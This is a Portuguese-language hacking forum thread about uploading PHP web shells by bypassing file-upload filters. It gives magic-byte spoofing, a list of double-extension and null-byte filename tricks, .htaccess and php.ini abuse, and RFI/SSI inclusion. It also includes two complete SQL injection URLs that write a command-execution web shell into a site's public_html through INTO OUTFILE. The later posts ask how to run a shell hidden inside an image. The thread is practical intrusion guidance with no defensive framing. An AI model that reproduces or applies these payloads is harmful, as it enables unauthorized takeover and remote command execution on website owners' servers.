tmb gostava saber

Qual tipo de filtro?

.

Se for um filtro que lê apenas o conteúdo e ignora a extensão, se vc tenta upa uma shell em php ele irá ler as primeiras linhas do código e vc não tera sucesso por exemplo:

<?php

código da shell aqui

?>

Agora se vc fizer isso:

Vc irá burlar o filtro porque ele só lê o conteúdo, quando ver GIF89;a no começo do código irá interpretar como se fosse uma imagem e vc irá conseguir upar sua shell sem problemas.

Outra alternativa, encriptar com base64 para evitar aquela mensagem de "Internal Server Error" pode se encodar o código aqui: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Tamper Data é uma alternativa (procura no Youtube tem mil videos), outra alternativa é acessar o diretório que a shell estaria mesmo se aparecer erro na tela (as vezes o erro aparece mas a shell é upada mesmo assim).

Se for um filtro que pega a extensão do nome do arquivo pode se tentar assim:

nome_do_arquivo.jpg.php
nome_do_arquivo.jpg%00.php
nome_do_arquivo.php%00.jpg
nome_do_arquivo.php ......
nome_do_arquivo.php;
nome_do_arquivo.php5
nome_do_arquivo.PHP
nome_do_arquivo.PhP
nome_do_arquivo.pHp
nome_do_arquivo.pHP

Se conseguir subir um .htaccess pode adicionar o código: Após isso upar uma shell no formato .gif que ele irá interpreta-la como php.

Se conseguir upar uma shell no formato de texto .txt pode se tentar:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Se for vulneravel a RFI pode tentar incluir apartir de outro site, por exemplo:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Se o site for vulnerável a SSI (Server Side Includes) pode se upar diretamente de um campo de pesquisa:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

No campo de busca coloque:
Outra maneira, se pegar uma vulnerabilidade que lhe de acesso ao terminal mas não tenha wget,

Irá criar o arquivo de texto shell.txt após isso é só move-lo para .php mv shell.txt nome_da_shell.php

Pode tentar upar um php.ini modificado para tentar ativar / desativar funções que o servidor estiver rodando para facilitar também.

Pode tentar também juntar a shell em uma imagem com Edjpgcom (procure Youtube).

Se o site for vulneravel a SQL Injection e de alguma forma vc conseguir visualizar o diretório raiz, vc pode criar um arquivo apartir da url o membro 0Kal já criou um tutorial explicando a algum tempo, dois exemplos:

Se não conseguir é necessário encodar em HEX o método abaixo.

POST:

http://www.sitevul.com.br/site/index.php?id=-1+union+select+all+1,2,3,"<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>cmd.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>" into outfile "/home/nome_do_site/public_html/nome_do_arquivo.php"

Após isso acessa nome_do_arquivo.php e terá acesso ao terminal via URL.

GET:

http://www.sitevul.com.br/site/index.php?id=-1+union+select+all+1,2,3,'<pre<?php system($_GET[\'cmd\']);?></pre>' into outfile '/home/nome_do_site/public_html/nome_do_arquivo.php'

Após isso:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...comando_aqui
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...[b]ls[b]

Tem mais centenas de formas, coloquei alguns.. o pessoal do fórum deve conhecer mais vários, basta procurar.

Espero ter ajudado.

Existem varias formas de burlar filtros, primeiro é necessário conhecer o filtro.

- Tamper Data
- BurpSuite
- Post Data
- Esteganografia

Pesquisando um pouco aqui no forum ou no google sobre esses assuntos, pode encontrar
algumas coisas relacionadas.

Boa sorte ae.

Uia

Não fui eu que pediu a ajuda, mas galera... fodásticas as respostas, valeu 1000000 de vezes... ^^

upei sheel fundida em imagem... e agora????

Então galera, eu fundí uma shell a uma imagem e dessa forma conseguí upa-la.... tem milhares de vídeos que explicam como fazer isso, mas tipo assim.... e depois?

Como eu mudo a extenção ou faço pra rodar o script que tá no codigo da imagem? Isso não achei em lugar algum... um help please????